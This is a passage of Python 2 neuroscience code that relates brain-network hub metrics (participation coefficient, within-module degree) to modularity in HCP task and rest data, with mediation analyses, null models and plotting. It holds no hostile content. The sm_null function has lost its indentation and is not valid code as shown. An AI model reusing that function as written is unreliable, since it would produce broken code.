		write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_mod_%s.node'%(task),sep='\t',index=False,names=False,header=False)
		node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_mod_%s.node'%(task)
		surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
		img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/mod_pc_corr_%s.png' %(task)
		configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
		eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
		# wcd values
		write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
		wmds = np.nanmean(subject_wmds,axis=0)
		write_df[3] = wmds
		write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
		write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmds_%s.node'%(task),sep='\t',index=False,names=False,header=False)
		node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmds_%s.node'%(task)
		surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
		img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/wmds_%s.png' %(task)
		configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
		eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
		#mod wcd values
		write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
		write_df[3] = mod_wmd_corr
		write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
		write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmd_mod_%s.node'%(task),sep='\t',index=False,names=False,header=False)
		node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_wmd_mod_%s.node'%(task)
		surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
		img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/mod_wmd_corr_%s.png' %(task)
		configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
		eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
	return pc_df,wmd_df
def matrix_of_changes():
	"""
	Make a matrix of each node's PC correlation to all edges in the graph.

	For each driver (PC or WCD) and each HCP task: splits nodes into Q+ (driver
	positively coupled with modularity) and Q- nodes, correlates each node's
	driver value with every edge weight across subjects, then plots matrices
	and compares within- vs between-community edge effects with t-tests.
	"""
	drivers = ['PC','WCD']
	tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
	project='hcp'
	atlas = 'power'
	known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	for driver in drivers:
		all_matrices = []
		violin_df = pd.DataFrame()
		for task in tasks:
			# subjects = np.array(hcp_subjects).copy()
			# subjects = list(subjects)
			# subjects = remove_missing_subjects(subjects,task,atlas)
			subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
			assert (subjects == np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_fz.npy'%(task,atlas))).all()
			static_results = graph_metrics(subjects,task,atlas)
			subject_pcs = static_results['subject_pcs']
			subject_mods = static_results['subject_mods']
			subject_wmds = static_results['subject_wmds']
			matrices = static_results['matrices']
			task_perf = task_performance(subjects,task)
			assert subject_pcs.shape[0] == len(subjects)
			mean_pc = np.nanmean(subject_pcs,axis=0)
			mean_wmd = np.nanmean(subject_wmds,axis=0)
			# node-wise coupling of PC / WCD with modularity
			mod_pc_corr = np.zeros(subject_pcs.shape[1])
			for i in range(subject_pcs.shape[1]):
				mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
			mod_wmd_corr = np.zeros(subject_wmds.shape[1])
			for i in range(subject_wmds.shape[1]):
				mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
			# Q+ nodes drive modularity up; Q- nodes are negatively coupled
			if driver == 'PC':
				predict_nodes = np.where(mod_pc_corr>0.0)[0]
				local_predict_nodes = np.where(mod_pc_corr<0.0)[0]
				pc_edge_corr = np.arctanh(pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(project,task,atlas)))
			else:
				predict_nodes = np.where(mod_wmd_corr>0.0)[0]
				local_predict_nodes = np.where(mod_wmd_corr<0.0)[0]
				pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(project,task,atlas)))
			# Plot matrix of changes
			# keep only edges above the 75th percentile of mean connectivity
			edge_thresh = 75
			edge_thresh = np.percentile(np.nanmean(matrices,axis=0),edge_thresh)
			pc_edge_corr[:,np.nanmean(matrices,axis=0)<edge_thresh,] = np.nan
			# upper triangle: Q+ node averages; lower triangle: Q- node averages
			high_pc_edge_matrix = np.nanmean(pc_edge_corr[predict_nodes],axis=0)
			low_pc_edge_matrix = np.nanmean(pc_edge_corr[local_predict_nodes],axis=0)
			matrix = (np.tril(low_pc_edge_matrix) + np.triu(high_pc_edge_matrix)).reshape((264,264))
			plot_matrix = matrix.copy()
			plot_matrix_mask = np.isnan(plot_matrix)
			# z-score the surviving entries for display
			zscores = scipy.stats.zscore(plot_matrix[plot_matrix_mask==False].reshape(-1))
			plot_matrix[plot_matrix_mask==False] = zscores
			if task != 'REST':
				all_matrices.append(plot_matrix)
			plot_corr_matrix(plot_matrix,network_names.copy(),out_file='/home/despoB/mb3152/dynamic_mod/figures/%s_corr_matrix_%s.pdf'%(driver,task),plot_corr=False,return_array=False)
			pc_edge_corr[np.isnan(pc_edge_corr)] = 0.0
			# boolean masks selecting, for each Q+/Q- node, its within- and
			# between-community edges (excluding the node's own edges and
			# nodes with unknown community membership)
			connector_within_network_mask = pc_edge_corr.copy().astype(bool)
			local_within_network_mask = pc_edge_corr.copy().astype(bool)
			connector_between_network_mask = pc_edge_corr.copy().astype(bool)
			local_between_network_mask = pc_edge_corr.copy().astype(bool)
			connector_within_network_mask[:,:,:] = False
			local_within_network_mask[:,:,:] = False
			connector_between_network_mask[:,:,:] = False
			local_between_network_mask[:,:,:] = False
			for n in predict_nodes:
				for node1,node2 in combinations(range(264),2):
					if n == node1:
						continue
					if n == node2:
						continue
					if known_membership[node1] == 0:
						continue
					if known_membership[node2] == 0:
						continue
					if known_membership[node1] == known_membership[node2]:
						connector_within_network_mask[n][node1,node2] = True
						connector_within_network_mask[n][node2,node1] = True
					else:
						connector_between_network_mask[n][node1,node2] = True
						connector_between_network_mask[n][node2,node1] = True
			for n in local_predict_nodes:
				for node1,node2 in combinations(range(264),2):
					if n == node1:
						continue
					if n == node2:
						continue
					if known_membership[node1] == 0:
						continue
					if known_membership[node2] == 0:
						continue
					if known_membership[node1] == known_membership[node2]:
						local_within_network_mask[n][node1,node2] = True
						local_within_network_mask[n][node2,node1] = True
					else:
						local_between_network_mask[n][node1,node2] = True
						local_between_network_mask[n][node2,node1] = True
			# helper: fixed-length string column for the violin DataFrame
			def make_strs_for_df(array_to_add,str_to_add):
				array_len = len(array_to_add)
				str_array_ = np.chararray(array_len,itemsize=40)
				str_array_[:] = str_to_add
				return str_array_
			# helper: stack three 1-D columns into one 2-D string array
			def make_array_for_df(arrays_to_add):
				append_array = np.zeros((len(arrays_to_add[0]),len(arrays_to_add))).astype(str)
				append_array[:,0] = arrays_to_add[0]
				append_array[:,1] = arrays_to_add[1]
				append_array[:,2] = arrays_to_add[2]
				return append_array
			violin_columns = ["r value, node i's PCs and j's edge weights","Node Type","Edge Type"]
			task_violin_df = pd.DataFrame(columns=violin_columns)
			# collect the nonzero r values under each of the four masks
			result_array_to_add = pc_edge_corr[connector_within_network_mask].reshape(-1)[pc_edge_corr[connector_within_network_mask].reshape(-1)!=0.0]
			edge_type_ = make_strs_for_df(result_array_to_add,'Within Community')
			node_type_ = make_strs_for_df(result_array_to_add,'Q+')
			df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
			task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
			result_array_to_add = pc_edge_corr[local_within_network_mask].reshape(-1)[pc_edge_corr[local_within_network_mask].reshape(-1)!=0.0]
			edge_type_ = make_strs_for_df(result_array_to_add,'Within Community')
			node_type_ = make_strs_for_df(result_array_to_add,'Q-')
			df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
			task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
			result_array_to_add = pc_edge_corr[connector_between_network_mask].reshape(-1)[pc_edge_corr[connector_between_network_mask].reshape(-1)!=0.0]
			edge_type_ = make_strs_for_df(result_array_to_add,'Between Community')
			node_type_ = make_strs_for_df(result_array_to_add,'Q+')
			df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
			task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
			result_array_to_add = pc_edge_corr[local_between_network_mask].reshape(-1)[pc_edge_corr[local_between_network_mask].reshape(-1)!=0.0]
			edge_type_ = make_strs_for_df(result_array_to_add,'Between Community')
			node_type_ = make_strs_for_df(result_array_to_add,'Q-')
			df_array_to_add = make_array_for_df([result_array_to_add,node_type_,edge_type_])
			task_violin_df = task_violin_df.append(pd.DataFrame(data=df_array_to_add,columns=violin_columns),ignore_index=True)
			task_violin_df["r value, node i's PCs and j's edge weights"] = task_violin_df["r value, node i's PCs and j's edge weights"].astype(float)
			# within- vs between-community t-tests, per node type
			if driver == 'PC':
				print task + ', Connector Hubs(Q+): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Within Community'],
					task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Between Community']))
				print task + ', Non-Connector Hubs(Q-): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Within Community'],
					task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Between Community']))
			else:
				print task + ', Local Hubs(Q+): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Within Community'],
					task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q+'][task_violin_df['Edge Type']=='Between Community']))
				print task + ', Non Local Hubs (Q-): ' + str(scipy.stats.ttest_ind(task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Within Community'],
					task_violin_df["r value, node i's PCs and j's edge weights"][task_violin_df['Node Type']=='Q-'][task_violin_df['Edge Type']=='Between Community']))
			#append for average of all
			violin_df = violin_df.append(pd.DataFrame(data=task_violin_df,columns=violin_columns),ignore_index=True)
			#Figure for single Task
			sns.set_style("white")
			sns.set_style("ticks")
			colors = sns.color_palette(['#fdfd96','#C4D8E2'])
			with sns.plotting_context("paper",font_scale=2):
				plt.figure(figsize=(24,16))
				sns.boxplot(x="Node Type", y="r value, node i's PCs and j's edge weights", hue="Edge Type", order=['Q+','Q-'], data=task_violin_df)
				plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/%s_edge_mod_%s.pdf'%(driver,task),dpi=4600)
				plt.close()
		# Average of All
		plot_corr_matrix(np.nanmean(all_matrices,axis=0),network_names.copy(),out_file='/home/despoB/mb3152/dynamic_mod/figures/%s_corr_matrix_avg.pdf'%(driver),plot_corr=False,return_array=False)
		# pooled t-tests across tasks (task here is the last task iterated)
		if driver == 'PC':
			print task + ',Connector Hubs(Q+): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Within Community'],
				violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Between Community']))
			print task + ', Non-Connector Hubs(Q-): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Within Community'],
				violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Between Community']))
		else:
			print task + ', Local Hubs(Q+): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Within Community'],
				violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q+'][violin_df['Edge Type']=='Between Community']))
			print task + ', Non-Local Hubs(Q-): ' + str(scipy.stats.ttest_ind(violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Within Community'],
				violin_df["r value, node i's PCs and j's edge weights"][violin_df['Node Type']=='Q-'][violin_df['Edge Type']=='Between Community']))
		sns.set_style("white")
		sns.set_style("ticks")
		colors = sns.color_palette(['#fdfd96','#C4D8E2'])
		with sns.plotting_context("paper",font_scale=3):
			plt.figure(figsize=(24,16))
			sns.boxplot(x="Node Type", y="r value, node i's PCs and j's edge weights",hue="Edge Type", palette=colors,order=['Q+','Q-'], data=violin_df)
			plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/%s_edge_mod_avg.pdf'%(driver),dpi=4600)
			plt.close()
def individual_pc_q():
	"""Regress Q on PC, per node, for nodes whose PC-Q coupling exceeds a threshold.

	Fits and saves polynomial (order 2, 3) and lowess regressions of subject
	modularity on subject PC, both per node (hue='node') and pooled.
	"""
	atlas = 'power'
	project='hcp'
	known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	task = 'REST'
	print task
	subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
	static_results = graph_metrics(subjects,task,atlas)
	matrices = static_results['matrices']
	subject_pcs = static_results['subject_pcs']
	subject_mods = static_results['subject_mods']
	mod_pc_corr = np.zeros(subject_pcs.shape[1])
	for i in range(subject_pcs.shape[1]):
		mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
	# only the single threshold .1 is actually used (second line overwrites)
	threshes = [0.1,.2,0.25,.3]
	threshes = [.1]
	mean_pc = np.nanmean(subject_pcs,axis=0)
	for thresh in threshes:
		# long-format table: one row per (subject, qualifying node)
		df = pd.DataFrame()
		for i in range(len(subject_pcs)):
			for pi,p in enumerate(subject_pcs[i]):
				if mod_pc_corr[pi] < thresh:
					continue
				df = df.append({'node':pi,'Q':subject_mods[i],'PC':p},ignore_index=True)
				# df = df.append({'node':pi,'Performance':task_perf[i],'PC':p},ignore_index=True)
		sns.lmplot('PC','Q',df,hue='node',order=2,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
		sns.plt.xlim([0,.75])
		sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_%s_2.pdf'%(thresh))
		sns.plt.close()
		sns.lmplot('PC','Q',df,hue='node',order=3,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
		sns.plt.xlim([0,.75])
		sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_%s_3.pdf'%(thresh))
		sns.plt.close()
		sns.lmplot('PC','Q',df,hue='node',lowess=True,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
		sns.plt.xlim([0,.75])
		sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_%s_lowless.pdf'%(thresh))
		sns.plt.close()
		# pooled (no hue) versions of the same fits
		sns.lmplot('PC','Q',df,order=2,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
		sns.plt.xlim([0,.75])
		sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_mean_%s_2.pdf'%(thresh))
		sns.plt.close()
		sns.lmplot('PC','Q',df,order=3,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
		sns.plt.xlim([0,.75])
		sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_mean_%s_3.pdf'%(thresh))
		sns.plt.close()
		sns.lmplot('PC','Q',df,lowess=True,truncate=True,scatter=False,scatter_kws={'label':'Order:1','color':'y'})
		sns.plt.xlim([0,.75])
		sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/pc_mod_regress_mean_%s_lowless.pdf'%(thresh))
		sns.plt.close()
def multi_med(data):
	"""Average causal mediation effect (ACME) of 'weight' between 'pc' and 'q'.

	Fits the outcome model q ~ weight + pc and the mediator model weight ~ pc
	on *data*, runs a 10-replicate mediation analysis, and returns the mean of
	the averaged ACME estimates.
	"""
	outcome = sm.OLS.from_formula("q ~ weight + pc", data)
	mediator = sm.OLS.from_formula("weight ~ pc", data)
	mediation_fit = Mediation(outcome, mediator, "pc", "weight").fit(n_rep=10)
	return np.mean(mediation_fit.ACME_avg)
def connector_mediation(task):
	"""
	264,264,264 matrix, which edges mediate the relationship between PC and Q

	m[n,i,j] is the ACME of edge (i,j) mediating node n's PC -> Q relationship,
	computed in parallel with multi_med and saved to disk.
	"""
	atlas = 'power'
	project='hcp'
	known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	subjects = np.load('%s/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %(homedir,'hcp',task,atlas))
	static_results = graph_metrics(subjects,task,atlas,run_version='fz')
	matrices = static_results['matrices']
	subject_pcs = static_results['subject_pcs']
	subject_mods = static_results['subject_mods']
	mod_pc_corr = np.zeros(subject_pcs.shape[1])
	for i in range(subject_pcs.shape[1]):
		mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
	mean_conn = np.nanmean(matrices,axis=0)
	# NOTE(review): e_tresh is computed but never used in this function
	e_tresh = np.percentile(mean_conn,85)
	subject_pcs[np.isnan(subject_pcs)] = 0.0
	m = np.zeros((264,264,264))
	pool = Pool(40)
	for n in range(264):
		print n
		sys.stdout.flush()
		# one mediation model per edge (i,j) for this node's PC
		variables = []
		for i,j in combinations(range(264),2):
			variables.append(pd.DataFrame(data={'pc':subject_pcs[:,n],'weight':matrices[:,i,j],'q':subject_mods},index=range(len(subject_pcs))))
		results = pool.map(multi_med,variables)
		# write each edge's ACME symmetrically into the n-th slice
		for r,i in zip(results,combinations(range(264),2)):
			m[n,i[0],i[1]] = r
			m[n,i[1],i[0]] = r
	np.save('/home/despoB/mb3152/dynamic_mod/results/full_med_matrix_new_%s.npy'%(task),m)
def local_mediation(task):
	"""
	264,264,264 matrix, which edges mediate the relationship between WMD and Q

	Same structure as connector_mediation but with WMD (within-module degree)
	as the node metric; results saved with a _wmds suffix.
	"""
	atlas = 'power'
	project='hcp'
	known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	subjects = np.load('%s/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %(homedir,'hcp',task,atlas))
	static_results = graph_metrics(subjects,task,atlas,run_version='fz')
	matrices = static_results['matrices']
	subject_pcs = static_results['subject_pcs']
	subject_wmds = static_results['subject_wmds']
	subject_mods = static_results['subject_mods']
	mod_wmd_corr = np.zeros(subject_wmds.shape[1])
	for i in range(subject_pcs.shape[1]):
		mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
	mean_conn = np.nanmean(matrices,axis=0)
	# NOTE(review): e_tresh is computed but never used in this function
	e_tresh = np.percentile(mean_conn,85)
	# NOTE(review): zeroes subject_wmds where subject_pcs is NaN -- the
	# connector version masks pcs by its own NaNs; confirm this cross-masking
	# is intended rather than np.isnan(subject_wmds).
	subject_wmds[np.isnan(subject_pcs)] = 0.0
	m = np.zeros((264,264,264))
	pool = Pool(40)
	for n in range(264):
		print n
		sys.stdout.flush()
		# one mediation model per edge (i,j) for this node's WMD
		variables = []
		for i,j in combinations(range(264),2):
			variables.append(pd.DataFrame(data={'pc':subject_wmds[:,n],'weight':matrices[:,i,j],'q':subject_mods},index=range(len(subject_pcs))))
		results = pool.map(multi_med,variables)
		for r,i in zip(results,combinations(range(264),2)):
			m[n,i[0],i[1]] = r
			m[n,i[1],i[0]] = r
	np.save('/home/despoB/mb3152/dynamic_mod/results/full_med_matrix_new_%s_wmds.npy'%(task),m)
def local_versus_connector_mediation(task):
	"""Do hubs' mediation effects concentrate on their own (strong) edges?

	For each task and each local/connector hub, t-tests the node's |ACME|
	values on its strong edges (mean connectivity above the 85th percentile)
	against its weak edges, then compares the t distributions of connector vs
	local hubs.

	NOTE(review): the ``task`` parameter is immediately shadowed by the for
	loop below, so the argument has no effect.
	"""
	locality_df = pd.DataFrame()
	for task in ['REST','WM','GAMBLING','SOCIAL','RELATIONAL','MOTOR','LANGUAGE']:
		atlas = 'power'
		project='hcp'
		known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
		subjects = np.load('%s/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %(homedir,'hcp',task,atlas))
		static_results = graph_metrics(subjects,task,atlas,run_version='fz')
		matrices = static_results['matrices']
		subject_pcs = static_results['subject_pcs']
		subject_wmds = static_results['subject_wmds']
		subject_mods = static_results['subject_mods']
		mod_wmd_corr = np.zeros(subject_wmds.shape[1])
		for i in range(subject_pcs.shape[1]):
			mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
		mod_pc_corr = np.zeros(subject_wmds.shape[1])
		for i in range(subject_pcs.shape[1]):
			mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
		mean_conn = np.nanmean(matrices,axis=0)
		e_tresh = np.percentile(mean_conn,85)
		# precomputed mediation tensors from local_mediation / connector_mediation
		local = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s_wmds.npy'%(homedir,task))
		connector = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s.npy'%(homedir,task))
		local = np.abs(local)
		connector = np.abs(connector)
		for i in range(264):
			# local hubs: nodes whose WMD is positively coupled with Q
			if i in np.arange(264)[np.where(mod_wmd_corr>0.0)]:
				real_t = scipy.stats.ttest_ind(local[i][np.argwhere(mean_conn[i]>e_tresh)][:,:,np.arange(264)!=i].reshape(-1),local[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
				locality_df = locality_df.append({"Node Type":'Local Hub','t':real_t},ignore_index=True)
			# connector hubs: nodes whose PC is positively coupled with Q
			if i in np.arange(264)[np.where(mod_pc_corr>0.0)]:
				real_t = scipy.stats.ttest_ind(connector[i][np.argwhere(mean_conn[i]>e_tresh)][:,:,np.arange(264)!=i].reshape(-1),connector[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
				locality_df = locality_df.append({"Node Type":'Connector Hub','t':real_t},ignore_index=True)
	locality_df.dropna(inplace=True)
	stat = tstatfunc(locality_df.t[locality_df["Node Type"]=='Connector Hub'],locality_df.t[locality_df["Node Type"]=='Local Hub'])
	print stat
def sm_null():
try:
r = np.load('/home/despoB/mb3152/dynamic_mod/results/null_sw_results.npy')
except:
sw_rs = []
sw_crs = []
for i in range(100):
print i
pc = []
mod = []
wmd = []
memlen = []
for s in range(100):
graph = Graph.Watts_Strogatz(1,264,7,.25)
graph.es["weight"] = np.ones(graph.ecount())
graph = graph.community_infomap()
graph = brain_graphs.brain_graph(graph)
pc.append(np.array(graph.pc))
wmd.append(np.array(graph.wmd))
mod.append(graph.community.modularity)
memlen.append(len(graph.community.sizes()))
pc = np.array(pc)
mod = np.array(mod)
wmd = np.array(wmd)
memlen = np.array(memlen)
mod_pc_corr = np.zeros(264)
for i in range(264):
mod_pc_corr[i] = nan_pearsonr(mod,pc[:,i])[0]
print pearsonr(np.nanmean(pc,axis=0),mod_pc_corr)[0]
print pearsonr(mod,memlen)[0]
sw_rs.append(pearsonr(np.nanmean(pc,axis=0),mod_pc_corr)[0])
sw_crs.append(pearsonr(mod,memlen)[0])
r = np.array([sw_rs,sw_crs])
np.save('/home/despoB/mb3152/dynamic_mod/results/null_sw_results.npy',r)
return r
def null():
	"""Compare the real PC/Q relationship against three graph null models.

	Null models (each computed per subject matrix via pool.map):
	  - null_graph_*:     random edges, real community assignment
	  - null_community_*: real edges, random community assignment
	  - null_all_*:       random edges, re-clustered
	Plus the Watts-Strogatz small-world null from sm_null(). Results are
	cached as .npy/.csv; the function ends by drawing a violin plot of the
	R distributions per null model. Python 2 syntax (print statements).
	"""
	# row 0 of sm_null(): r between mean PC and per-node r(Q, PC)
	sm_null_results = sm_null()[0]
	atlas = 'power'
	project='hcp'
	task = 'REST'
	known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task,atlas))
	static_results = graph_metrics(subjects,task,atlas,'fz')
	subject_pcs = static_results['subject_pcs']
	subject_wmds = static_results['subject_wmds']
	subject_mods = static_results['subject_mods']
	subject_wmds = static_results['subject_wmds'] # duplicate assignment (no-op)
	matrices = static_results['matrices']
	try:
		# load cached null distributions and the "real data" reference results
		null_graph_rs,null_community_rs,null_all_rs = np.load('/home/despoB/mb3152/dynamic_mod/results/null_results.npy')
		real_df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/results/real_real_results.csv')
	except:
		# NOTE(review): this 1/0 raises ZeroDivisionError on any cache miss, so the
		# recompute path below never runs automatically. It looks like a deliberate
		# debugging stop; remove it to re-enable the rebuild code. Confirm intent.
		1/0
		null_graph_rs = []
		null_community_rs = []
		null_all_rs = []
		for i in range(100):
			# one bootstrap iteration: run all three null models on every subject matrix
			pool = Pool(40)
			n_g = pool.map(null_graph_individual_graph_analyes,matrices)
			n_c = pool.map(null_community_individual_graph_analyes,matrices)
			n_a = pool.map(null_all_individual_graph_analyes,matrices)
			"""
			null graph
			"""
			# --- random edges, real communities ---
			n_g_subject_pcs = []
			n_g_subject_wmds = []
			n_g_subject_mods = []
			for mod,pc,wmd in n_g:
				n_g_subject_mods.append(mod)
				n_g_subject_pcs.append(pc)
				n_g_subject_wmds.append(wmd)
			n_g_subject_pcs = np.array(n_g_subject_pcs)
			n_g_subject_wmds = np.array(n_g_subject_wmds)
			n_g_subject_mods = np.array(n_g_subject_mods)
			mean_pc = np.nanmean(n_g_subject_pcs,axis=0)
			mean_wmd = np.nanmean(n_g_subject_wmds,axis=0)
			# NOTE(review): the inner loops below reuse the outer bootstrap index `i`;
			# harmless only because the outer `for` rebinds it each iteration.
			n_g_mod_pc_corr = np.zeros(n_g_subject_pcs.shape[1])
			for i in range(n_g_subject_pcs.shape[1]):
				n_g_mod_pc_corr[i] = nan_pearsonr(n_g_subject_mods,n_g_subject_pcs[:,i])[0]
			n_g_mod_wmd_corr = np.zeros(n_g_subject_wmds.shape[1])
			for i in range(n_g_subject_wmds.shape[1]):
				n_g_mod_wmd_corr[i] = nan_pearsonr(n_g_subject_mods,n_g_subject_wmds[:,i])[0]
			print 'Pearson R, PC & Q, Mean PC: ', nan_pearsonr(n_g_mod_pc_corr,mean_pc)
			null_graph_rs.append(nan_pearsonr(n_g_mod_pc_corr,mean_pc)[0])
			# print 'Pearson R, PC & WCD, Mean WMD: ', nan_pearsonr(n_g_mod_wmd_corr,mean_wmd)
			# --- real edges, random communities ---
			n_c_subject_pcs = []
			n_c_subject_wmds = []
			n_c_subject_mods = []
			for mod,pc,wmd in n_c:
				n_c_subject_mods.append(mod)
				n_c_subject_pcs.append(pc)
				n_c_subject_wmds.append(wmd)
			n_c_subject_pcs = np.array(n_c_subject_pcs)
			n_c_subject_wmds = np.array(n_c_subject_wmds)
			n_c_subject_mods = np.array(n_c_subject_mods)
			mean_pc = np.nanmean(n_c_subject_pcs,axis=0)
			mean_wmd = np.nanmean(n_c_subject_wmds,axis=0)
			n_c_mod_pc_corr = np.zeros(n_c_subject_pcs.shape[1])
			for i in range(n_c_subject_pcs.shape[1]):
				n_c_mod_pc_corr[i] = nan_pearsonr(n_c_subject_mods,n_c_subject_pcs[:,i])[0]
			n_c_mod_wmd_corr = np.zeros(n_c_subject_wmds.shape[1])
			for i in range(n_c_subject_wmds.shape[1]):
				n_c_mod_wmd_corr[i] = nan_pearsonr(n_c_subject_mods,n_c_subject_wmds[:,i])[0]
			print 'Pearson R, PC & Q, Mean PC: ', nan_pearsonr(n_c_mod_pc_corr,mean_pc)
			null_community_rs.append(nan_pearsonr(n_c_mod_pc_corr,mean_pc)[0])
			# print 'Pearson R, PC & WCD, Mean WMD: ', nan_pearsonr(mod_wmd_corr,mean_wmd)
			# --- random edges, re-clustered ---
			n_a_subject_pcs = []
			n_a_subject_wmds = []
			n_a_subject_mods = []
			for mod,pc,wmd in n_a:
				n_a_subject_mods.append(mod)
				n_a_subject_pcs.append(pc)
				n_a_subject_wmds.append(wmd)
			n_a_subject_pcs = np.array(n_a_subject_pcs)
			n_a_subject_wmds = np.array(n_a_subject_wmds)
			n_a_subject_mods = np.array(n_a_subject_mods)
			mean_pc = np.nanmean(n_a_subject_pcs,axis=0)
			mean_wmd = np.nanmean(n_a_subject_wmds,axis=0)
			n_a_mod_pc_corr = np.zeros(n_a_subject_pcs.shape[1])
			for i in range(n_a_subject_pcs.shape[1]):
